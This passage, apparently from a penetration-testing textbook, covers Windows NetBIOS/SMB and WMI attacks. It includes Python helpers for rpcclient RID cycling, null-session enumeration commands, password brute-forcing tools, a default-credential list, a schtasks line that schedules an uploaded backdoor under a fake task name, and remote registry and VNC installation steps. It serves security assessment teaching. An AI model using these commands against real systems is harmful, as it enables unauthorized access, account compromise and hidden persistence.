user:[daffy] rid:[0x3ee]
user:[donald] rid:[0x3ec]
user:[Guest] rid:[0x1f5]
user:[IUSR_WEBSERV] rid:[0x3e9]
user:[IWAM_WEBSERV] rid:[0x3ea]
user:[test] rid:[0x3ed]
user:[TsInternetUser] rid:[0x3e8]
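The RID cycling and forward lookup procedures from Examples 10-9 and 10-10, worked through as an added example (this is not Samba code; the helpers are constructed here): it takes the domain SID from a lookupnames result, generates batched `rpcclient -c 'lookupsids ...'` command lines for a RID range (lookupsids accepts several SIDs per call), parses the lookupsids and enumdomusers output formats, stops treating SIDs as mapped at NT_STATUS_NONE_MAPPED, and merges both views while flagging the well-known RIDs 500, 501 and 502, so a renamed Administrator still stands out. The sample transcripts reproduce Examples 10-9 and 10-10 with the backslashes restored.

```python
"""Drive and interpret LSARPC/SAMR user enumeration through rpcclient.
Added example, not part of Samba: helpers and samples are constructed here;
the samples reproduce Examples 10-9 and 10-10."""
import re
import shlex

BUILTIN_RIDS = {500: "Administrator", 501: "Guest", 502: "krbtgt"}

DOMAIN_SID_RE = re.compile(r"\b(S-1-5-21-\d+-\d+-\d+)-(\d+)\b")
LOOKUPSIDS_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)\s+(\S+?)(?:\s+\((\d+)\))?$")
ENUMDOMUSERS_RE = re.compile(r"^user:\[(.*)\]\s+rid:\[0x([0-9a-f]+)\]$", re.I)


def domain_sid(lookupnames_output: str) -> str:
    """The domain part (everything before the RID) of the first SID returned."""
    m = DOMAIN_SID_RE.search(lookupnames_output)
    if not m:
        raise ValueError("no domain SID in lookupnames output")
    return m.group(1)


def cycle_commands(host, user, password, dom_sid, start=500, stop=1100, batch=40):
    """rpcclient -c command lines that resolve RIDs start..stop in batches;
    one rpcclient process per batch keeps a failed lookup from ending the run."""
    cmds = []
    for lo in range(start, stop + 1, batch):
        sids = " ".join(f"{dom_sid}-{rid}" for rid in range(lo, min(lo + batch, stop + 1)))
        cmds.append(f"rpcclient -U {shlex.quote(user + '%' + password)} "
                    f"-c {shlex.quote('lookupsids ' + sids)} {host}")
    return cmds


def parse_lookupsids(output: str) -> dict:
    """RID -> (domain, name) for every SID that mapped. Unmapped SIDs
    (NT_STATUS_NONE_MAPPED, or *unknown*\\*unknown* in newer Samba) are skipped."""
    users = {}
    for line in map(str.strip, output.splitlines()):
        m = LOOKUPSIDS_RE.match(line)
        if not m or "unknown" in m.group(3).lower():
            continue
        domain, _, name = m.group(3).partition("\\")
        users[int(m.group(2))] = (domain, name)
    return users


def parse_enumdomusers(output: str) -> dict:
    """name -> RID from enumdomusers (rpcclient prints the RIDs in hex)."""
    matches = map(ENUMDOMUSERS_RE.match, map(str.strip, output.splitlines()))
    return {m.group(1): int(m.group(2), 16) for m in matches if m}


def classify(rid: int, name: str) -> str:
    """Well-known RIDs identify built-in accounts regardless of their name."""
    builtin = BUILTIN_RIDS.get(rid)
    if builtin and name.lower() != builtin.lower():
        return f"built-in {builtin} renamed to {name}"
    if builtin:
        return f"built-in {builtin}"
    return "user-created account" if rid >= 1000 else "well-known/system RID"


def reconcile(enum: dict, cycled: dict) -> dict:
    """Merge enumdomusers (name -> rid) with lookupsids (rid -> (dom, name)).
    When RestrictAnonymous blocks enumdomusers, cycled results still fill in."""
    merged = {rid: name for name, rid in enum.items()}
    for rid, (_domain, name) in cycled.items():
        merged.setdefault(rid, name)
    return {rid: (name, classify(rid, name)) for rid, name in sorted(merged.items())}


# Constructed samples reproducing the rpcclient output from Examples 10-9 and 10-10.
SAMPLE_LOOKUPNAMES = "chris S-1-5-21-1177238915-1563985344-1957994488-1003 (User: 1)"
SAMPLE_LOOKUPSIDS = r"""
S-1-5-21-1177238915-1563985344-1957994488-1001 WEBSERV\IUSR_WEBSERV
S-1-5-21-1177238915-1563985344-1957994488-1002 WEBSERV\IWAM_WEBSERV
S-1-5-21-1177238915-1563985344-1957994488-1003 WEBSERV\chris
S-1-5-21-1177238915-1563985344-1957994488-1004 WEBSERV\donald
S-1-5-21-1177238915-1563985344-1957994488-1005 WEBSERV\test
S-1-5-21-1177238915-1563985344-1957994488-1006 WEBSERV\daffy
result was NT_STATUS_NONE_MAPPED
"""
SAMPLE_ENUMDOMUSERS = """
user:[Administrator] rid:[0x1f4]
user:[chris] rid:[0x3eb]
user:[daffy] rid:[0x3ee]
user:[donald] rid:[0x3ec]
user:[Guest] rid:[0x1f5]
user:[IUSR_WEBSERV] rid:[0x3e9]
user:[IWAM_WEBSERV] rid:[0x3ea]
user:[test] rid:[0x3ed]
user:[TsInternetUser] rid:[0x3e8]
"""

if __name__ == "__main__":
    sid = domain_sid(SAMPLE_LOOKUPNAMES)
    print("\n".join(cycle_commands("192.168.0.25", "chris", "password", sid, 500, 1010)))
    merged = reconcile(parse_enumdomusers(SAMPLE_ENUMDOMUSERS), parse_lookupsids(SAMPLE_LOOKUPSIDS))
    for rid, (name, note) in merged.items():
        print(f"{rid:>5}  {name:<16} {note}")
```

Run the printed rpcclient lines and feed their output to parse_lookupsids(); RIDs from 1000 upward are the user-created accounts, and a gap followed by further hits means you should keep cycling rather than stop at the first NT_STATUS_NONE_MAPPED.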
The rpcclient tool is extremely powerful and versatile; it allows user accounts to be created remotely and privileges to be elevated. However, this functionality requires a valid username and password combination, often necessitating the use of brute force.
Jean-Baptiste Marchand posted an advisory to BugTraq on July 7, 2005 (http://marc.info/?l=bugtraq&m=112076409813099&w=2), describing a flaw within Windows 2003 SP1, Windows XP SP2, Windows 2000 SP4, and Windows NT 4.0 systems, allowing for an anonymous SMB null session to be established with NetBIOS and CIFS services, which in turn can be used to anonymously access RPC server named pipe interfaces, as follows:
Local Security Authority (LSA) RPC server (\pipe\lsarpc)
LSA Security Account Manager (SAM) RPC server (\pipe\samr)
LSA Netlogon RPC server (\pipe\netlogon)
Service Control Manager (SCM) RPC server (\pipe\svcctl)
Eventlog service RPC server (\pipe\eventlog)
Server service RPC server (\pipe\srvsvc)
Workstation service RPC server (\pipe\wkssvc)
These service endpoints can be queried using tools such as Samba rpcclient, allowing remote unauthenticated attackers to enumerate users and groups, view running services, and view the server event logs under Windows NT 4.0 and Windows 2000 SP4 in their default configurations. Windows Server 2003 Active Directory and domain controllers are also susceptible, although Windows XP SP2 is largely shielded from these vulnerabilities.
Jean-Baptiste Marchand’s presentation covering null sessions and RPC named pipes is available from http://www.hsc.fr/ressources/presentations/null_sessions/. He discusses hardcoded named pipes that are present in Windows XP SP1 and earlier, and how these can be used to proxy RPC queries and commands to other RPC named pipe interfaces that run within the same service instance server-side.
In 2002, the Chinese hacking group netXeyes developed WMICracker (http://www.netxeyes.org/wmicracker.exe). The tool accesses Windows Management Instrumentation (WMI) components over DCOM to brute-force the passwords of users in the Administrators group.
Example 10-11 shows WMICracker in use against port 135 of 192.168.189.2 to brute-force the Administrator password using the dictionary file words.txt.
C:\> WMICracker 192.168.189.2 Administrator words.txt
WMICracker 0.1, Protype for Fluxay5. by netXeyes 2002.08.29
http://www.netXeyes.com, [email protected]
Waiting For Session Start....
Testing qwerty...Access is denied.
Testing password...Access is denied.
Testing secret...Access is denied.
Administrator's Password is control
The venom utility also brute-forces user passwords across WMI. At the time of writing, venom is available at http://www.cqure.net/tools/venom-win32-1_1_5.zip.
WMIdump (http://www.cqure.net/wp/?page_id=28) is a Windows tool that can be used to query the WMI subsystem and dump useful internal system information. At the time of writing, the current binary is available from http://www.cqure.net/tools/wmidump-dotnet-1_3_0.zip.
In particular, WMIdump is used to enumerate the following for a given Windows host:
Operating system and computer details
System accounts and users
Installed hotfixes
Running processes
Running services and settings
Installed software and patch levels
Network adapters installed and associated settings
Serial port and modem settings
Logical disks
WMIdump is shown in Example 10-12 dumping system details, including user accounts, from the remote host over WMI.
C:\> WMIdump -c config\standard.config -u Administrator -p control -t 192.168.189.2
WMIDump v1.3.0 by [email protected]
-----------------------------------
Dumping 192.168.189.2:Win32_Process
Dumping 192.168.189.2:Win32_LogicalDisk
Dumping 192.168.189.2:Win32_NetworkConnection
Dumping 192.168.189.2:Win32_ComputerSystem
Dumping 192.168.189.2:Win32_OperatingSystem
Dumping 192.168.189.2:Win32_Service
Dumping 192.168.189.2:Win32_SystemUsers
Dumping 192.168.189.2:Win32_ScheduledJob
Dumping 192.168.189.2:Win32_Share
Dumping 192.168.189.2:Win32_SystemAccount
Dumping 192.168.189.2:Win32_LogicalProgramGroup
Dumping 192.168.189.2:Win32_Desktop
Dumping 192.168.189.2:Win32_Environment
Dumping 192.168.189.2:Win32_SystemDriver
Dumping 192.168.189.2:Win32_NetworkClient
Dumping 192.168.189.2:Win32_NetworkProtocol
Dumping 192.168.189.2:Win32_ComputerSystemProduct
Dumping 192.168.189.2:Win32_QuickFixEngineering

C:\> dir 192.168.189.2
 Volume in drive C is HARDDISK
 Volume Serial Number is 846A-8EA9

 Directory of C:\192.168.189.2

08/07/2007  17:52    <DIR>          .
08/07/2007  17:52    <DIR>          ..
08/07/2007  17:52             1,183 Win32_ComputerSystem.dmp
08/07/2007  17:52               196 Win32_ComputerSystemProduct.dmp
08/07/2007  17:52               912 Win32_Desktop.dmp
08/07/2007  17:52             2,747 Win32_Environment.dmp
08/07/2007  17:52               768 Win32_LogicalDisk.dmp
08/07/2007  17:52            18,387 Win32_LogicalProgramGroup.dmp
08/07/2007  17:52               717 Win32_NetworkClient.dmp
08/07/2007  17:52                 0 Win32_NetworkConnection.dmp
08/07/2007  17:52             6,655 Win32_NetworkProtocol.dmp
08/07/2007  17:52             1,573 Win32_OperatingSystem.dmp
08/07/2007  17:52            24,848 Win32_Process.dmp
08/07/2007  17:52            17,032 Win32_QuickFixEngineering.dmp
08/07/2007  17:52                 0 Win32_ScheduledJob.dmp
08/07/2007  17:52            38,241 Win32_Service.dmp
08/07/2007  17:52               274 Win32_Share.dmp
08/07/2007  17:52             2,382 Win32_SystemAccount.dmp
08/07/2007  17:52            55,184 Win32_SystemDriver.dmp
08/07/2007  17:52             1,262 Win32_SystemUsers.dmp
              18 File(s)        172,361 bytes
               2 Dir(s)    103,497,728 bytes free

C:\> type 192.168.189.2\Win32_SystemUsers.dmp
GroupComponent;PartComponent;
\\WEBSERV\root\cimv2:Win32_ComputerSystem.Name="WEBSERV";\\WEBSERV\root\cimv2:Win32_UserAccount.Name="Administrator",Domain="OFFICE";
\\WEBSERV\root\cimv2:Win32_ComputerSystem.Name="WEBSERV";\\WEBSERV\root\cimv2:Win32_UserAccount.Name="ASPNET",Domain="OFFICE";
\\WEBSERV\root\cimv2:Win32_ComputerSystem.Name="WEBSERV";\\WEBSERV\root\cimv2:Win32_UserAccount.Name="Guest",Domain="OFFICE";
\\WEBSERV\root\cimv2:Win32_ComputerSystem.Name="WEBSERV";\\WEBSERV\root\cimv2:Win32_UserAccount.Name="__vmware_user__",Domain="OFFICE";
After compromising a valid password of a user in the Administrators group, you can execute commands through the Task Scheduler interface. To do so, Urity developed a Windows utility called Remoxec; it’s available from http://www.securityfriday.com and the O’Reilly tools archive at http://examples.oreilly.com/networksa/tools/remoxec101.zip. Figure 10-2 shows the tool in use; it requires the target IP address and valid credentials.
The NetBIOS name service is accessible through UDP port 137. The service processes NetBIOS Name Table (NBT) requests in environments where Windows is being used along with workgroups, domains, or Active Directory components.
You can easily enumerate the following system details by querying the name service:
NetBIOS hostname
The domain of which the system is a member
Authenticated users currently using the system
Accessible network interface MAC addresses
The inbuilt Windows nbtstat command can enumerate these details remotely. Example 10-13 shows how it can be run against 192.168.189.1.
C:\> nbtstat -A 192.168.189.1
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
WEBSERV <00> UNIQUE Registered
WEBSERV <20> UNIQUE Registered
OSG-WHQ <00> GROUP Registered
OSG-WHQ <1E> GROUP Registered
OSG-WHQ <1D> UNIQUE Registered
__MSBROWSE__ <01> GROUP Registered
WEBSERV <03> UNIQUE Registered
__VMWARE_USER__<03> UNIQUE Registered
ADMINISTRATOR <03> UNIQUE Registered
MAC Address = 00-50-56-C0-A2-09
The information shown in Example 10-13 shows that the hostname is WEBSERV, the domain is OSG-WHQ, and two users, __VMWARE_USER__ and ADMINISTRATOR, are currently logged in (their <03> names are registered for the Messenger service). Table 10-5 lists common NetBIOS name codes and descriptions.
| NetBIOS code | Type | Information obtained |
| --- | --- | --- |
| <00> | UNIQUE | Hostname |
| <00> | GROUP | Domain name |
| <host name><03> | UNIQUE | Messenger service running for that computer |
| <user name><03> | UNIQUE | Messenger service running for that individual logged-in user |
| <20> | UNIQUE | Server service running |
| <1D> | GROUP | Master browser name for the subnet |
| <1B> | UNIQUE | Domain master browser name, identifies the PDC for that domain |
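To make the NBT leakage concrete, here is an added example (not from the original text or from nbtstat) that decodes a node-status response of the kind nbtstat -A receives, following the RFC 1002 layout, and applies the Table 10-5 codes to report hostname, domain, logged-in users and MAC address. The response bytes are constructed inline to mirror Example 10-13.

```python
"""Decode a NetBIOS node-status (NBSTAT) response, the reply behind nbtstat -A.

Added example, not part of the original text or of any tool it describes. The
wire layout follows RFC 1002; SAMPLE is constructed below to mirror Example 10-13
so a defender can see exactly which fields leak which detail.
"""
import struct

NBSTAT = 0x0021           # RR_TYPE of a node status record
FLAG_GROUP = 0x8000       # NAME_FLAGS G bit: GROUP name, otherwise UNIQUE
FLAG_ACTIVE = 0x0400      # NAME_FLAGS ACT bit: shown as "Registered" by nbtstat


def _printable(raw: bytes) -> str:
    # Names are space-padded to 15 bytes; __MSBROWSE__ carries 0x01/0x02 markers.
    return "".join(c for c in raw.decode("latin-1") if c.isprintable()).strip()


def parse_node_status(packet: bytes) -> dict:
    """Parse a node-status response into its name table and unit id (the MAC)."""
    _, flags, _, ancount, _, _ = struct.unpack(">6H", packet[:12])
    if not flags & 0x8000 or ancount != 1:
        raise ValueError("not a single-answer NBNS response")
    pos = 12
    while packet[pos]:                         # RR_NAME labels end with a 0x00 byte
        pos += 1 + packet[pos]
    pos += 1
    rr_type, _, _, rdlen = struct.unpack(">HHIH", packet[pos:pos + 10])
    pos += 10
    if rr_type != NBSTAT:
        raise ValueError("answer is not a node status record")
    rdata = packet[pos:pos + rdlen]
    num_names = rdata[0]
    table = []
    for i in range(num_names):
        off = 1 + 18 * i                       # each NODE_NAME entry is 18 bytes
        name, suffix = rdata[off:off + 15], rdata[off + 15]
        nflags, = struct.unpack(">H", rdata[off + 16:off + 18])
        table.append({"name": _printable(name), "suffix": suffix,
                      "group": bool(nflags & FLAG_GROUP),
                      "active": bool(nflags & FLAG_ACTIVE)})
    mac = rdata[1 + 18 * num_names:7 + 18 * num_names]   # STATISTICS.UNIT_ID
    return {"names": table, "mac": "-".join("%02X" % b for b in mac)}


def summarize_exposure(parsed: dict) -> dict:
    """Apply Table 10-5: host = UNIQUE<00>, domain = GROUP<00>,
    logged-in users = UNIQUE<03> entries other than the hostname itself."""
    host = next((e["name"] for e in parsed["names"]
                 if e["suffix"] == 0x00 and not e["group"]), None)
    domain = next((e["name"] for e in parsed["names"]
                   if e["suffix"] == 0x00 and e["group"]), None)
    users = [e["name"] for e in parsed["names"]
             if e["suffix"] == 0x03 and not e["group"] and e["name"] != host]
    return {"hostname": host, "domain": domain, "users": users, "mac": parsed["mac"]}


def build_node_status_response(names, mac: bytes, trn_id: int = 0x1234) -> bytes:
    """Construct a response for testing; names = [(name_bytes, suffix, is_group)]."""
    rdata = bytes([len(names)])
    for name, suffix, is_group in names:
        nflags = FLAG_ACTIVE | (FLAG_GROUP if is_group else 0)
        rdata += name.ljust(15, b" ") + bytes([suffix]) + struct.pack(">H", nflags)
    rdata += mac + bytes(40)                   # UNIT_ID followed by zeroed statistics
    star = b"*".ljust(16, b"\x00")             # the "*" name a node-status query asks about
    encoded = bytes(0x41 + n for b in star for n in (b >> 4, b & 0xF))   # first-level encoding
    rr_name = b"\x20" + encoded + b"\x00"
    header = struct.pack(">6H", trn_id, 0x8400, 0, 1, 0, 0)   # response, authoritative, 1 answer
    return header + rr_name + struct.pack(">HHIH", NBSTAT, 1, 0, len(rdata)) + rdata


# Constructed sample mirroring the name table in Example 10-13.
SAMPLE = build_node_status_response([
    (b"WEBSERV", 0x00, False), (b"WEBSERV", 0x20, False),
    (b"OSG-WHQ", 0x00, True), (b"OSG-WHQ", 0x1E, True), (b"OSG-WHQ", 0x1D, False),
    (b"\x01\x02__MSBROWSE__\x02", 0x01, True), (b"WEBSERV", 0x03, False),
    (b"__VMWARE_USER__", 0x03, False), (b"ADMINISTRATOR", 0x03, False),
], mac=bytes.fromhex("005056C0A209"))

if __name__ == "__main__":
    print(summarize_exposure(parse_node_status(SAMPLE)))
```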
The NetBIOS name service is vulnerable to a number of attacks if UDP port 137 is accessible from the Internet or an untrusted network. MITRE CVE lists these issues, shown in Table 10-6.
| CVE name | Date | Notes |
| --- | --- | --- |
| CVE-2003-0661 | 03/09/2003 | NBNS in Windows NT 4.0, 2000, XP, and Server 2003 may include random memory in a response to a NBNS query, which can allow remote attackers to obtain sensitive information. |
| CVE-2000-0673 | 27/07/2000 | NBNS doesn't perform authentication, which allows remote attackers to cause a denial-of-service by sending a spoofed Name Conflict or Name Release datagram. |
| CVE-1999-0288 | 25/09/1999 | Malformed NBNS traffic results in WINS crash. |
The NetBIOS datagram service is accessible through UDP port 138. Just as the NetBIOS name service is vulnerable to various naming attacks (resulting in denial of service in some cases), the NetBIOS datagram service can be used to manipulate the target host and its NetBIOS services.
Anthony Osborne of PGP COVERT Labs published an advisory in August 2000 that documented a NetBIOS name cache corruption attack that can be launched by sending crafted UDP datagrams to port 138. The full advisory is available at http://www.securityfocus.com/advisories/2556.
RFC 1002 defines the way in which Windows NetBIOS host information is encapsulated within the NetBIOS datagram header. When a browse frame request is received (on UDP port 138), Windows extracts the information from the datagram header and stores it in the NetBIOS name cache. In particular, the source NetBIOS name and IP address are blindly extracted from the datagram header and inserted into the cache.
A useful scenario in which to undertake this attack would be to send the target host a crafted NetBIOS datagram that mapped a known NetBIOS name on the internal network (such as a domain controller) to your IP address. When the target host attempted to connect to the server by its NetBIOS name, it would instead connect to your IP address. An attacker can use Cain & Abel (http://www.oxid.it) to capture rogue SMB password hashes in this scenario (which he can then crack and use to access other hosts).
Interestingly, Microsoft didn’t release a patch for this issue: due to the unauthenticated nature of NetBIOS naming, it’s a fundamental vulnerability! The MITRE CVE contains good background information within CVE-2000-1079.
The NetBIOS session service is accessible through TCP port 139. In particular, the service facilitates authentication across a Windows workgroup or domain and provides access to resources (such as files and printers). You can perform the following attacks against the NetBIOS session service:
Enumerate details of users, shared folders, security policies, and domain information
Brute-force user passwords
After authenticating with the NetBIOS session service as a privileged user, you can:
Upload and download files and programs
Schedule and run arbitrary commands on the target host
Access the registry and modify keys
Access the SAM password database for cracking
The CESG CHECK guidelines specify that candidates should be able to enumerate system details through NetBIOS (including users, groups, shares, domains, domain controllers, and password policies), including user enumeration through RID cycling. After enumerating system information, candidates are required to brute-force valid user passwords and access the filesystem and registry of the remote host upon authenticating.
Various tools can enumerate sensitive information from a target Windows host with TCP port 139 open. Information can be collected either anonymously by initiating what is known as a null session, or through knowledge of a valid username and password. A null session is when you authenticate with the IPC$ share of the target host in the following manner:
net use \\target\IPC$ "" /user:""
By specifying a null username and password, you gain anonymous access to IPC$. By default, Windows hosts allow anonymous access to system and network information through NetBIOS, so the following can be gleaned:
User list
Machine list
NetBIOS name list
Share list
Password policy information
Group and member list
Local Security Authority (LSA) policy information
Trust information between domains and hosts
Here are three Windows command-line tools that are commonly used to enumerate this information:
enum (http://razor.bindview.com/tools/files/enum.tar.gz)
winfo (http://www.ntsecurity.nu/toolbox/winfo/)
GetAcct (http://www.securityfriday.com)
Many other tools can perform enumeration through null sessions; however, I find that these three utilities give excellent results in terms of user, system, and policy details.
Jordan Ritter’s enum utility is a Windows command-line tool that can extensively query the NetBIOS session service. The tool can list usernames, password policy, shares, and details of other hosts including domain controllers. Example 10-14 shows the enum usage information.
D:\enum> enum
usage: enum [switches] [hostname|ip]
-U: get userlist
-M: get machine list
-N: get namelist dump (different from -U|-M)
-S: get sharelist
-P: get password policy information
-G: get group and member list
-L: get LSA policy information
-D: dictionary crack, needs -u and -f
-d: be detailed, applies to -U and -S
-c: don't cancel sessions
-u: specify username to use (default "")
-p: specify password to use (default "")
-f: specify dictfile to use (wants -D)
By default, the tool attempts to use an anonymous null session to enumerate system information. You can, however, specify a username and password from the command line or even use the -D flag along with the -u and -f <filename> options to perform brute-force grinding of a valid user password against the NetBIOS session service.
Any combination of the query flags can be used within a single command. Example 10-15 shows enum being used to enumerate user, group details, and password policy information.
D:\enum> enum -UGP 192.168.189.1
server: 192.168.189.1
setting up session... success.
password policy:
  min length: none
  min age: none
  max age: 42 days
  lockout threshold: none
  lockout duration: 30 mins
  lockout reset: 30 mins
getting user list (pass 1, index 0)... success, got 5.
  __vmware_user__ Administrator Guest Mickey VUSR_OSG-SERV
Group: Administrators
OSG-SERV\Administrator
Group: Backup Operators
Group: Guests
OSG-SERV\Guest
Group: Power Users
OSG-SERV\Mickey
Group: Replicator
Group: Users
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
Group: __vmware__
OSG-SERV\__vmware_user__
cleaning up... success.
These details show that the out-of-box default Windows 2000 password policy is in place (no minimum password length or account lockout threshold). Along with the standard Administrator, Guest, and other system accounts, the user Mickey is also present.
The winfo utility gives a good overview of the target Windows host through a null session. It collects information that enum doesn’t, including domain trust details and currently logged-in users. Example 10-16 demonstrates winfo in use.
D:\> winfo 192.168.189.1
Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom
- http://www.ntsecurity.nu/toolbox/winfo/
SYSTEM INFORMATION:
- OS version: 5.0
DOMAIN INFORMATION:
- Primary domain (legacy): OSG-WHQ
- Account domain: OSG-SERV
- Primary domain: OSG-WHQ
- DNS name for primary domain:
- Forest DNS name for primary domain:
PASSWORD POLICY:
- Time between end of logon time and forced logoff: No forced logoff
- Maximum password age: 42 days
- Minimum password age: 0 days
- Password history length: 0 passwords
- Minimum password length: 0 characters
LOCOUT POLICY:
- Lockout duration: 30 minutes
- Reset lockout counter after 30 minutes
- Lockout threshold: 0
SESSIONS:
- Computer: OSG-SERV
- User: ADMINISTRATOR
LOGGED IN USERS:
* __vmware_user__
* Administrator
USER ACCOUNTS:
* Administrator
(This account is the built-in administrator account)
* Guest
(This account is the built-in guest account)
* mickey
* VUSR_OSG-SERV
* __vmware_user__
WORKSTATION TRUST ACCOUNTS:
INTERDOMAIN TRUST ACCOUNTS:
SERVER TRUST ACCOUNTS:
SHARES:
* IPC$
- Type: Unknown
- Remark: Remote IPC
* D$
- Type: Special share reserved for IPC or administrative share
- Remark: Default share
* ADMIN$
- Type: Special share reserved for IPC or administrative share
- Remark: Remote Admin
* C$
- Type: Special share reserved for IPC or administrative share
- Remark: Default share
By default, Windows systems share all drive letters in use, such as C$ and D$ in the examples here. These shares can be accessed remotely upon authenticating, allowing you to upload and download data. The other shares shown here (IPC$ and ADMIN$) are for administrative purposes, such as installing software and managing processes running on the host remotely.
GetAcct is a useful tool that allows you to perform reverse-lookups for Windows server RID values to get user account names (also known as RID cycling). Standard enumeration tools such as enum and winfo simply use forward-lookup techniques to dump the user list, which administrators can protect against by setting RestrictAnonymous=1 within the system registry (discussed later under the "Windows Networking Services Countermeasures" section).
Windows NT 4.0 hosts can only set RestrictAnonymous=1, and are thus susceptible to RID cycling. Windows 2000 hosts have extended anonymous access protection which can be set with RestrictAnonymous=2, preventing RID cycling from being effective. Figure 10-3 shows GetAcct in action against a Windows 2000 host at 192.168.189.1.
The SMBCrack and SMB-AT tools can brute-force user passwords through the NetBIOS session service; they are available from the following sites:
http://www.netxeyes.org/smbcrack.exe
http://www.cqure.net/tools/smbat-win32bin-1.0.4.zip
http://www.cqure.net/tools/smbat-src-1.0.5.tar.gz
Table 10-7 shows a short list of common Windows login and password combinations. Backup and management software including ARCserve and Tivoli require dedicated user accounts on the server or local machine to function, and are often set with weak passwords.
| User login name | Password |
| --- | --- |
| Administrator | (blank) |
| arcserve | arcserve, backup |
| tivoli | tivoli |
| backupexec | backupexec, backup |
| test | test |
Before launching a brute-force password-grinding exercise, it is sensible to enumerate the account lockout policy for the system you are going to attack, as shown in Example 10-15 and Example 10-16. If you launch a brute-force attack against a domain controller that is set to lock accounts after a specified number of unsuccessful login attempts, you can easily lock out the entire domain.
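As an added example (not from the original text or from enum), the following turns the policy block of Example 10-15 into numbers and shows how an account lockout threshold bounds online password guessing per account. The 1,200 attempts/s figure is the smbbf rate quoted later in this chapter; the minimum-length baseline used by policy_findings is an assumption of this example.

```python
"""Quantify what the anonymously readable password policy permits.

Added example, not part of the original text or of enum. ENUM_OUTPUT is the
policy block of Example 10-15 embedded as sample input. SMBBF_RATE_PER_SEC is
the ~1,200 attempts/s quoted for smbbf later in the chapter; MIN_LENGTH_BASELINE
is an assumed audit baseline, not a figure from the text.
"""
import re

ENUM_OUTPUT = """\
password policy:
  min length: none
  min age: none
  max age: 42 days
  lockout threshold: none
  lockout duration: 30 mins
  lockout reset: 30 mins
"""

# Units enum prints, converted to minutes; bare counts are left as-is.
UNIT_MINUTES = {"mins": 1, "minutes": 1, "hours": 60, "days": 1440}
MIN_LENGTH_BASELINE = 8          # assumed baseline for the audit check below
SMBBF_RATE_PER_SEC = 1200.0      # unthrottled guess rate quoted for smbbf

_LINE = re.compile(r"^\s*([a-z ]+?):\s*(none|\d+)(?:\s+([a-z]+))?\s*$", re.M | re.I)


def parse_enum_policy(text: str) -> dict:
    """Map each 'key: value [unit]' line to an int ('none' -> 0, durations in minutes)."""
    policy = {}
    for key, value, unit in _LINE.findall(text):
        n = 0 if value.lower() == "none" else int(value)
        policy[key.strip().lower()] = n * UNIT_MINUTES.get(unit.lower(), 1)
    return policy


def lockout_bound(policy: dict, rate_per_sec: float = SMBBF_RATE_PER_SEC) -> dict:
    """Ceiling on failed logons per account per hour that the policy permits.

    With no threshold the only limit is the service itself (rate_per_sec). With a
    threshold, at most `threshold` failures fit in each reset window before the
    account locks, which is also why a blind run against a domain controller can
    lock out every account it touches."""
    threshold = policy.get("lockout threshold", 0)
    reset = policy.get("lockout reset", 0)
    if threshold == 0 or reset == 0:
        return {"lockout_enforced": False,
                "max_failures_per_hour": rate_per_sec * 3600}
    return {"lockout_enforced": True,
            "max_failures_per_hour": threshold * 60.0 / reset}


def policy_findings(policy: dict) -> list:
    """The out-of-box weaknesses the text calls out, phrased as audit findings."""
    findings = []
    min_len = policy.get("min length", 0)
    if min_len < MIN_LENGTH_BASELINE:
        findings.append("minimum password length %d is below baseline %d"
                        % (min_len, MIN_LENGTH_BASELINE))
    if policy.get("lockout threshold", 0) == 0:
        findings.append("no account lockout threshold: unlimited online guessing")
    return findings


if __name__ == "__main__":
    current = parse_enum_policy(ENUM_OUTPUT)
    print(current)
    print("as found:", lockout_bound(current))
    print("with threshold 5:", lockout_bound(dict(current, **{"lockout threshold": 5})))
    for finding in policy_findings(current):
        print("FINDING:", finding)
```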
Upon cracking a valid user account password, you can authenticate with NetBIOS by using the net command from a Windows platform or a tool such as smbclient in Unix-like environments with Samba (http://www.samba.org) installed. The net command usage is as follows:
net use \\target\IPC$ password /user:username
You can also use the net utility to authenticate with ADMIN$ or administrative drive shares (C$, D$, etc.). After successfully authenticating, you can try to execute commands server-side, upload and download files, and modify registry keys.
You can execute local commands through SMB via the Service Control Manager (SCM) or Task Scheduler. To execute commands through the Task Scheduler, we use the Windows schtasks command upon authenticating with a NetBIOS session or CIFS service with the ADMIN$ share. The schtasks command schedules programs to run at a designated time through the Task Scheduler service. Example 10-17 shows how I authenticate against 192.168.189.1 (with the username Administrator and password secret), and then schedule c:\temp\o2k.exe (a known backdoor that I have uploaded) to run at 10:30.
C:\> schtasks /create /s 192.168.189.1 /u WEBSERV\Administrator /p secret /sc ONCE /st 10:30:00 /tr c:\temp\o2k.exe /tn BackupExec
schtasks has a lot of options and flags that can be set and used. Please review Microsoft KB article 814596 (http://support.microsoft.com/kb/814596) for further details and use cases. We can review pending jobs on 192.168.189.1 in the following way:
C:\> schtasks /query /s 192.168.189.1
TaskName Next Run Time Status
==================================== ======================== ===============
BackupExec 10:30:00, 08/07/2007
To execute commands directly through the SCM (as opposed to the Task Scheduler), we can use PsExec (part of the Sysinternals PsTools package, available from http://download.sysinternals.com/files/pstools.zip). PsExec usage is discussed in http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx.
You can use three tools from the Microsoft Windows NT Resource Kit to access and manipulate system registry keys on a given host:
regdmp: accesses and dumps the system registry remotely
regini: used to set and modify registry keys remotely
reg: used with the delete option to remove registry keys
After authenticating with the NetBIOS session service, regdmp is used to dump the contents of the registry. regdmp has the following usage:
REGDMP [-m \\machinename | -h hivefile hiveroot | -w Win95 Directory] [-i n] [-o outputWidth] [-s] [-o outputWidth] registryPath
Example 10-18 shows regdmp in use against 192.168.189.1 to dump the contents of the entire system registry.
C:\> regdmp -m \\192.168.189.1
Registry
Machine [17 1 8]
HARDWARE [17 1 8]
ACPI [17 1 8]
DSDT [17 1 8]
GBT__ _ [17 1 8]
AWRDACPI [17 1 8]
00001000 [17 1 8]
00000000 = REG_BINARY 0x00003bb3 0x54445344
0x00003bb3 0x42470101 0x20202054
0x44525741 0x49504341 0x00001000
0x5446534d 0x0100000c 0x5f5c1910
0x5b5f5250 0x2e5c1183 0x5f52505f
0x30555043 0x00401000 0x5c080600
0x5f30535f 0x0a040a12 0x0a000a00
0x08000a00 0x31535f5c 0x040a125f
You can add or modify registry keys using the regini command along with crafted text files containing the new keys and values. To silently install a VNC server on a target host, you first have to set two registry keys to define which port the service listens on and the VNC password for authentication purposes. A text file (winvnc.ini in this case) is assembled first:
HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3
